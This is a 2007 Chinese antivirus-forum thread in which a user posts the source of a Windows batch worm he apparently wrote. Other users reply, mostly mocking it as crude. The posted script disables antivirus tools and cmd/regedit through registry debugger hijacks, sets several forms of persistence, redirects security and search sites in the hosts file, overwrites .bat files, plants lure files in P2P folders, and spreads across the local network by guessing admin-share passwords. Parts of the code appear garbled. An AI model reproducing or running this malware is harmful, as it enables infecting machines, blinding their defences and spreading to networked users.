查看: 3539|回复: 12
收起左侧

[技术原创] 我昨天个那个病毒 主要源代码……

 关闭 [复制链接]
金剑
头像被屏蔽
发表于 2007-3-5 16:41:24 | 显示全部楼层 |阅读模式
@echo off
set KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\VsTskMgr.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\naPrdMgr.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\UpdaterUI.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\TBMon.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\scan32.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Ravmond.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\CCenter.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\RavTask.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Rav.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Ravmon.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\RavmonD.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\RavStub.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\KVXP.kxp" /v Debugger /d svchost.exe /f
reg add "%KEY%\kvMonXP.kxp" /v Debugger /d svchost.exe /f
reg add "%KEY%\KVCenter.kxp" /v Debugger /d svchost.exe /f
reg add "%KEY%\KVSrvXP.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\KRegEx.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\UIHost.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\TrojDie.kxp" /v Debugger /d svchost.exe /f
reg add "%KEY%\FrogAgent.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\cmd.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\regedit.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Regedt32.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\freepp.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\free.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Kav.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
set a=BV2008
copy %0 %windir%\%a%.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Ravupdate /t REG_SZ /d %windir%\%a%.bat /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Ravupdate /t REG_SZ /d %windir%\%a%.bat /f > nul
set BV20081=echo
%BV20081% [windows] >> %windir%\win.ini
%BV20081% run=%windir%\%a%.bat >> %windir%\win.ini
%BV20081% load=%windir%\%a%.bat >> %windir%\win.ini
%BV20081% [boot] >> %windir%\system.ini
%BV20081% shell=explorer.exe %a%.bat >> %windir%\system.ini
net share ADMIN$
net share C$
net share IPC$
net share c=c:
net share d=d:
set BV20082=echo
%BV20082% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.baidu.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.jiangmin.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.baidu.cn >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.kingsoft.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.rising.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.rising.com.cn >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.mmsk.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 shadu.baidu.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 online.rising.com.cn >> %windir%\system32\drivers\etc\hosts
set x=%random%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v BV2008 /t REG_SZ /d "%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
md %programfiles%\BV2008\xxx\ > nul
md %programfiles%\BV2008\系统忠告\ > nul
copy %0 %programfiles%\BV2008\Winsts\Rav.txt.bat > nul
copy %0 %programfiles%\BV2008\系统忠告\keygen.exe.bat > nul
copy %0 %programfiles%\BV2008\系统忠告\serialsV7.exe.bat > nul
copy %0 %programfiles%\BV2008\系统忠告\crack_it.exe.bat > nul
echo 请使用 crack_it.exe优化操作系统 > %programfiles%\BV2008\系统忠告\说明.txt
echo 风暴胜者(www.v0day.com) I love you!> %programfiles%\BV2008\系统忠告\说明.txt
net share xxx&系统忠告=%programfiles%\BV2008 > nul
set BV2008a=copy
%BV2008a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%BV2008a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%BV2008a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%BV2008a% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%BV2008a% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%BV2008a% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
:20052
chcp 1252 > nul
%random%%BV2008%%random%%BV2008%
copy %0 "C:\Documents and Settings\All Users\Startmen Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmen Programme\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmen %random%.bat" > nul
copy %0 "C:\Documents and Settings\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%2008%%random%%2008%
for f tokens=2 delims= %%a in ('ipconfig ^ find i ip address') do (set ip=%%
a&& goto gof)
gof
set ip=%ip =%
for f tokens=1,2,3 delims=. %%b in (%ip%) do (set ip1=1
call bb %%b %%c %%d %ip1%)
bb
set IP=%1.%2.%3.%ip1%
ping %IP% -n 2  findstr i time && net use %IP%ipc$  useradministrator && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  administrator && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  stu && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  student && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  work && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  123 && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  123456 && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  baidu && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
set a ip1+=1
if %ip1% lss 255 goto bb
taskkill /f /im *监控.exe > nul
taskkill /f /im *专杀.exe > nul
goto 20052
:: BV2008 by 2008
:: Please Not user Fbsz(www.v0day.com)
azazkjkj
发表于 2007-3-5 17:00:52 | 显示全部楼层
低级病毒……
看起来好像OSO……
金剑
头像被屏蔽
 楼主| 发表于 2007-3-5 17:00:58 | 显示全部楼层
具有局域网感染……
azazkjkj
发表于 2007-3-5 17:08:59 | 显示全部楼层
我解决的掉,仔细看完病毒后。
我给你提个意见,别做类似OSO的病毒了,转行吧。
连Autorun都没封。
天下无毒
发表于 2007-3-5 17:12:52 | 显示全部楼层
呵呵  号称雅虎的反间谍专家都能杀    哎
i_Kaspersky
发表于 2007-3-5 17:19:46 | 显示全部楼层
妈呀,查看这个帖子费尔报告有毒啊。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
leohare
发表于 2007-3-5 17:35:56 | 显示全部楼层

回复 #6 i_Kaspersky 的帖子

我的费而也报了。看样子不像误报
天下无毒
发表于 2007-3-5 17:38:03 | 显示全部楼层
NOD不报
剑指七星
发表于 2007-3-5 18:22:19 | 显示全部楼层
神呀
小朋友又有新作了
逝去の小丑 该用户已被删除
发表于 2007-3-6 11:43:21 | 显示全部楼层
唉~~
做反病毒不成,竟做起病毒来了~
PS:这个病毒实在低级
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-29 00:26 , Processed in 0.130055 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表